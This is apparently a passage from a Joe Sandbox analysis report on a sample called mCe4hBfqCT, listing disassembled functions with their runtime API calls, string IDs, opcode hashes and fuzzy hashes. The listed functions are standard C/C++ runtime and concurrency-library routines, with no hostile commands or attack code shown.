                                                  • API String ID: 3527080286-2461957735
                                                  • Opcode ID: c5a83a7c3a5692031bd98a2408cfaa5972c38f8111fe63a4894d5265efbafef3
                                                  • Instruction ID: 47f9428d28cfd6d6d0fcc487ca1ad96a5e838d4e1f3ed62f9574ed722bc2da70
                                                  • Opcode Fuzzy Hash: c5a83a7c3a5692031bd98a2408cfaa5972c38f8111fe63a4894d5265efbafef3
                                                  • Instruction Fuzzy Hash: 1A51A07490160ADBCF14DFA8E6481AEBBB0FF0D300F6551A7E480AB255C7798D29CB1E
                                                  Function 00419766 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419788
                                                  • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419792
                                                  • DuplicateHandle.KERNEL32(00000000), ref: 00419799
                                                  • SafeRWList.LIBCONCRT ref: 004197B8
                                                    • Part of subcall function 00417787: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417798
                                                    • Part of subcall function 00417787: List.LIBCMT ref: 004177A2
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197CA
                                                  • GetLastError.KERNEL32 ref: 004197D9
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197EF
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004197FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                  • String ID: eventObject
                                                  • API String ID: 1999291547-1680012138
                                                  • Opcode ID: f2fd52a031fb61bc76af8f85f01e8766478cf52a27c2f29204c16f3f9ad69e75
                                                  • Instruction ID: 74ee1ce6077461ea63ae9e00130f3aceb1e9566028cac9141ddd6988e3fa2b51
                                                  • Opcode Fuzzy Hash: f2fd52a031fb61bc76af8f85f01e8766478cf52a27c2f29204c16f3f9ad69e75
                                                  • Instruction Fuzzy Hash: 6511A075600105EACB14EFA5CC49FEF77B8AF00701F20012BF42AE21D1DB789E85866D
                                                  Function 00431E06 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00431E1A
                                                    • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                    • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                  • _free.LIBCMT ref: 00431E26
                                                  • _free.LIBCMT ref: 00431E31
                                                  • _free.LIBCMT ref: 00431E3C
                                                  • _free.LIBCMT ref: 00431E47
                                                  • _free.LIBCMT ref: 00431E52
                                                  • _free.LIBCMT ref: 00431E5D
                                                  • _free.LIBCMT ref: 00431E68
                                                  • _free.LIBCMT ref: 00431E73
                                                  • _free.LIBCMT ref: 00431E81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                  • Instruction ID: 37ceee84360c9df2d19b7be330e975e9230a82d8295317da332a0d8bba7d8220
                                                  • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                  • Instruction Fuzzy Hash: 9111A476100508AFCB02EF56C852CD93BA5EF18355F1190AAFA088F232DA76EF519F84
                                                  Function 0304206D Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 03042081
                                                    • Part of subcall function 030436F1: HeapFree.KERNEL32(00000000,00000000,?,0304A37F,?,00000000,?,00000000,?,0304A623,?,00000007,?,?,0304AA17,?), ref: 03043707
                                                    • Part of subcall function 030436F1: GetLastError.KERNEL32(?,?,0304A37F,?,00000000,?,00000000,?,0304A623,?,00000007,?,?,0304AA17,?,?), ref: 03043719
                                                  • _free.LIBCMT ref: 0304208D
                                                  • _free.LIBCMT ref: 03042098
                                                  • _free.LIBCMT ref: 030420A3
                                                  • _free.LIBCMT ref: 030420AE
                                                  • _free.LIBCMT ref: 030420B9
                                                  • _free.LIBCMT ref: 030420C4
                                                  • _free.LIBCMT ref: 030420CF
                                                  • _free.LIBCMT ref: 030420DA
                                                  • _free.LIBCMT ref: 030420E8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                  • Instruction ID: 718dfce87047121d8d357de91fa850a28c183d089cf0742b66ec07b4869af600
                                                  • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                  • Instruction Fuzzy Hash: 9911A4BE501249AFCB41EF58D952CD93BA5EF44390B0190A1BA188F221DA31DB609F80
                                                  Function 0042E1D2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: __cftoe
                                                  • String ID: f(@$f(@
                                                  • API String ID: 4189289331-2391611762
                                                  • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                  • Instruction ID: 3bb8b72b3fcb016b6809a9d2676edbb9e39e2dfdcc2cff5661f77b8cf8a8e7b7
                                                  • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                  • Instruction Fuzzy Hash: 8F511B32600215EBDB249B5BAC41EAF77ADEF49325F90425FF815D6282DB3DD900867C
                                                  Function 004286F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _ValidateLocalCookies.LIBCMT ref: 0042871B
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00428723
                                                  • _ValidateLocalCookies.LIBCMT ref: 004287B1
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 004287DC
                                                  • _ValidateLocalCookies.LIBCMT ref: 00428831
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: 11@$@fB$csm
                                                  • API String ID: 1170836740-1464837749
                                                  • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                  • Instruction ID: 85514cbf9916709cbd5a6cdf55cb31cf47df2c82886cb460035ca25a3a5e93b8
                                                  • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                  • Instruction Fuzzy Hash: E6411634B012289BCF00DF29DC41A9E7BB1AF80328F64815FE8146B392DB399D11CB99
                                                  Function 03034AD4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 03034AED
                                                    • Part of subcall function 03034DBC: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,03034820), ref: 03034DCC
                                                  • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 03034B02
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 03034B11
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03034B1F
                                                  • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 03034B95
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 03034BD5
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03034BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                  • String ID: 11@
                                                  • API String ID: 3151764488-1785270423
                                                  • Opcode ID: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                  • Instruction ID: 4d7584df0209f1ba402a469962c1b6f5d0bcfafce72facf9bee1d35e8b27bd18
                                                  • Opcode Fuzzy Hash: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                  • Instruction Fuzzy Hash: 6331E639A013159BCF04EF69C881ABDB3BDFF86210F2449A9E9119F251DB70EE05CB90
                                                  Function 030431B0 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3beae9f1c9406c94f3234c3fab2046d002450fb23d60068b3c1d9a8504aa6807
                                                  • Instruction ID: 68a79958962087c969265175c0a6ba4b751149b175187eb848e445fb3374d370
                                                  • Opcode Fuzzy Hash: 3beae9f1c9406c94f3234c3fab2046d002450fb23d60068b3c1d9a8504aa6807
                                                  • Instruction Fuzzy Hash: 37C1D3B8906345AFCB12DFA8D8407EDBBF4AF4A310F0855E5E414AB391D730EA51CB65
                                                  Function 00430EE2 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                  • _memcmp.LIBVCRUNTIME ref: 0043118C
                                                  • _free.LIBCMT ref: 004311FD
                                                  • _free.LIBCMT ref: 00431216
                                                  • _free.LIBCMT ref: 00431248
                                                  • _free.LIBCMT ref: 00431251
                                                  • _free.LIBCMT ref: 0043125D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorLast$_memcmp
                                                  • String ID: 11@
                                                  • API String ID: 4275183328-1785270423
                                                  • Opcode ID: e83dd170e9aceaa49a18aa447ce4e6aa2231a1eba3255cf494227ba5bae8955a
                                                  • Instruction ID: ce7b668dfa5c2bb7c4e9a3ceca6e831dbf532e5f0ec0879f8663b0dec614f287
                                                  • Opcode Fuzzy Hash: e83dd170e9aceaa49a18aa447ce4e6aa2231a1eba3255cf494227ba5bae8955a
                                                  • Instruction Fuzzy Hash: ABB13975A016199FDB24DF18C894AAEB7B4FF08304F1086EEE949A7360D775AE90CF44
                                                  Function 03041149 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 266COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03042161: GetLastError.KERNEL32(?,?,0303AA0C,?,00000000,?,0303CE06,0301249A,00000000,?,00451F20), ref: 03042165
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 03042198
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421D9
                                                  • _free.LIBCMT ref: 03041464
                                                  • _free.LIBCMT ref: 0304147D
                                                  • _free.LIBCMT ref: 030414AF
                                                  • _free.LIBCMT ref: 030414B8
                                                  • _free.LIBCMT ref: 030414C4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorLast
                                                  • String ID: 11@$C
                                                  • API String ID: 3291180501-2085848483
                                                  • Opcode ID: 59ec6d9c9ee678a81a712376643e3923b663826dc85482b92aac5d645df1fc00
                                                  • Instruction ID: 78de516d515a8ce5d511dd482daf63fef72c24dec0507de098f224f3eb35eaca
                                                  • Opcode Fuzzy Hash: 59ec6d9c9ee678a81a712376643e3923b663826dc85482b92aac5d645df1fc00
                                                  • Instruction Fuzzy Hash: 50B13BB5A022199FDB68DF18D884AADB7F4FF48304F1445EAD949A7350E731AE90CF40
                                                  Function 0303304B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 03033071
                                                    • Part of subcall function 03028AD2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 03028ADD
                                                  • SafeSQueue.LIBCONCRT ref: 0303308A
                                                  • Concurrency::location::_Assign.LIBCMT ref: 0303314A
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0303316B
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03033179
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                  • String ID: 11@
                                                  • API String ID: 3496964030-1785270423
                                                  • Opcode ID: 1108ac3f23d22df1866ed980c188d809bd5bf3cbbedc25416d83390793702934
                                                  • Instruction ID: fe716c577b422d78a7912e233ce8cd9539f50b568c4812bca2df38857fa5f143
                                                  • Opcode Fuzzy Hash: 1108ac3f23d22df1866ed980c188d809bd5bf3cbbedc25416d83390793702934
                                                  • Instruction Fuzzy Hash: 713107396027119FCB65EF69C890AAEBBF8FF85710F144599D8468F251DB30E845CBD0
                                                  Function 00428CDD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
                                                  • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D49
                                                  • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D50
                                                  • PMDtoOffset.LIBCMT ref: 00428D6F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: FindInstanceTargetType$Offset
                                                  • String ID: Bad dynamic_cast!
                                                  • API String ID: 1467055271-2956939130
                                                  • Opcode ID: e5f2063d30d8dc2abb1216183244daa9fe4e349d0d1adbdecd789d64e98e0801
                                                  • Instruction ID: c140271802722e6f94c7424985ceb8b8a000001532c96d06de554d190e41459b
                                                  • Opcode Fuzzy Hash: e5f2063d30d8dc2abb1216183244daa9fe4e349d0d1adbdecd789d64e98e0801
                                                  • Instruction Fuzzy Hash: A02132727062259FCF14DE65F906AAE77A8EF64724B60811FE900D32C1DF3CE805C6A9
                                                  Function 0302C6E0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • atomic_compare_exchange.LIBCONCRT ref: 0302C6FC
                                                  • atomic_compare_exchange.LIBCONCRT ref: 0302C720
                                                  • std::_Cnd_initX.LIBCPMT ref: 0302C731
                                                  • std::_Cnd_initX.LIBCPMT ref: 0302C73F
                                                    • Part of subcall function 03011370: __Mtx_unlock.LIBCPMT ref: 03011377
                                                  • std::_Cnd_initX.LIBCPMT ref: 0302C74F
                                                    • Part of subcall function 0302C40F: __Cnd_broadcast.LIBCPMT ref: 0302C416
                                                  • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0302C75D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                  • String ID: 11@
                                                  • API String ID: 4258476935-1785270423
                                                  • Opcode ID: a9be804968ec124da136a858fa875f7bf6ea548f420eac5ce240c38f8c534d78
                                                  • Instruction ID: d665b1671ac39f67b091878393844875aaa9bb9787912eb0eae1adef52f2b9f9
                                                  • Opcode Fuzzy Hash: a9be804968ec124da136a858fa875f7bf6ea548f420eac5ce240c38f8c534d78
                                                  • Instruction Fuzzy Hash: 3101F2B9902725A7EB14FB60CD84BEEBB5CAF80310F580151E9049B680EB78EB1587D1
                                                  Function 0040C63D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C69C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Exception@8Throw
                                                  • String ID: :3@$f(@$f(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                  • API String ID: 2005118841-316725708
                                                  • Opcode ID: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                  • Instruction ID: d382e3a4140bff2bd7f1e847cb7cd930782ec9a0d5dc38d66c16a87299b4fd47
                                                  • Opcode Fuzzy Hash: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                  • Instruction Fuzzy Hash: 8BF0FC72900208AAC714DB54DC82BAB33589B15305F14857BED41BA1C2EA7DAD05C79C
                                                  Function 00432154 Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D958,0042D958,?,?,?,004323A5,00000001,00000001,23E85006), ref: 004321AE
                                                  • __alloca_probe_16.LIBCMT ref: 004321E6
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004323A5,00000001,00000001,23E85006,?,?,?), ref: 00432234
                                                  • __alloca_probe_16.LIBCMT ref: 004322CB
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043232E
                                                  • __freea.LIBCMT ref: 0043233B
                                                    • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                  • __freea.LIBCMT ref: 00432344
                                                  • __freea.LIBCMT ref: 00432369
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3864826663-0
                                                  • Opcode ID: b11f90d838427d37edd64e38e717b3af24babdf9d4b4099e4006f2966c914547
                                                  • Instruction ID: a5f38111fa01d07f603b669534a8c8f44d85fc048aacd33138e2e818ffff9497
                                                  • Opcode Fuzzy Hash: b11f90d838427d37edd64e38e717b3af24babdf9d4b4099e4006f2966c914547
                                                  • Instruction Fuzzy Hash: B8513672600606AFDB258F75CD81EBF37A9EB48754F24426AFD04E6250DBBCDC40C658
                                                  Function 00439ECE Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                  • Instruction ID: 1cba7b180e09f8073ff63dd7a5e39a9331c2ed4ff1a144fb7a18fbb91be6d7aa
                                                  • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                  • Instruction Fuzzy Hash: 0761F071900205AFDB24DF69C842B9ABBF4EF09710F10516BE884EB382E7799E418B59
                                                  Function 0304A135 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 9dd0af2cd9ac545e18683059acdc486e5edaf4f6a50a58f2a1e3dc1611189c70
                                                  • Instruction ID: 91c4edf8fac5bc51b95cdf73606f4ada441ed0d08b97c1a70c3e3b5eba4783da
                                                  • Opcode Fuzzy Hash: 9dd0af2cd9ac545e18683059acdc486e5edaf4f6a50a58f2a1e3dc1611189c70
                                                  • Instruction Fuzzy Hash: 8661F0B9A42305AFDB60CF68C841B9EBBF8EF45720F1441BAE844EB340E7719E519B50
                                                  Function 004338A3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(?,0042C25D,E0830C40,?,?,?,?,?,?,00434018,0040DDFA,0042C25D,?,0042C25D,0042C25D,0040DDFA), ref: 004338E5
                                                  • __fassign.LIBCMT ref: 00433960
                                                  • __fassign.LIBCMT ref: 0043397B
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,0042C25D,00000001,?,00000005,00000000,00000000), ref: 004339A1
                                                  • WriteFile.KERNEL32(?,?,00000000,00434018,00000000,?,?,?,?,?,?,?,?,?,00434018,0040DDFA), ref: 004339C0
                                                  • WriteFile.KERNEL32(?,0040DDFA,00000001,00434018,00000000,?,?,?,?,?,?,?,?,?,00434018,0040DDFA), ref: 004339F9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: 104bec089efa8ddbbf106d3ba7b26555e8bb7f605cb6606e0c3875e27b37aebe
                                                  • Instruction ID: 3302cc5d055cfa7cb2d102f804d659735755d65fc8cb0b0a8ea62d8a9f37e22e
                                                  • Opcode Fuzzy Hash: 104bec089efa8ddbbf106d3ba7b26555e8bb7f605cb6606e0c3875e27b37aebe
                                                  • Instruction Fuzzy Hash: 1E51B3B09002499FCB10DFA8D845BEEBBF4EF09701F14412BE556E7391E7349A51CB69
                                                  Function 03043B0A Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,0304427F,?,?,?,?,?,?), ref: 03043B4C
                                                  • __fassign.LIBCMT ref: 03043BC7
                                                  • __fassign.LIBCMT ref: 03043BE2
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 03043C08
                                                  • WriteFile.KERNEL32(?,?,00000000,0304427F,00000000,?,?,?,?,?,?,?,?,?,0304427F,?), ref: 03043C27
                                                  • WriteFile.KERNEL32(?,?,00000001,0304427F,00000000,?,?,?,?,?,?,?,?,?,0304427F,?), ref: 03043C60
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: 3d1a47c850e04374499698871a03745696c64c98de2feb07923d8311921bf8e0
                                                  • Instruction ID: 80e8a2bf63bcd35e5247d1a874af364596f96307f99ba4c5c2315820f433249c
                                                  • Opcode Fuzzy Hash: 3d1a47c850e04374499698871a03745696c64c98de2feb07923d8311921bf8e0
                                                  • Instruction Fuzzy Hash: 0F51E7B8E01209AFCB10DFA8DC85BEEBBF8EF49310F14416AE555E7291D7309A51CB60
                                                  Function 0302B14D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _SpinWait.LIBCONCRT ref: 0302B172
                                                    • Part of subcall function 030211A8: _SpinWait.LIBCONCRT ref: 030211C0
                                                  • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0302B186
                                                  • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0302B1B8
                                                  • List.LIBCMT ref: 0302B23B
                                                  • List.LIBCMT ref: 0302B24A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                  • String ID: 6+A
                                                  • API String ID: 3281396844-2819411039
                                                  • Opcode ID: 6ffcc6e76adf532cd1f074ee0a3a399835260594ca9526c60de83cd6ea276e11
                                                  • Instruction ID: ae7eda45dccb87162dd3eea8219d989ba5dffb9c0d71435b6cfd56b50937960e
                                                  • Opcode Fuzzy Hash: 6ffcc6e76adf532cd1f074ee0a3a399835260594ca9526c60de83cd6ea276e11
                                                  • Instruction Fuzzy Hash: 02315936D06766DFCB14EFA8D9906EDFFB1BF84208F48006AC8426B651DB716914CB94
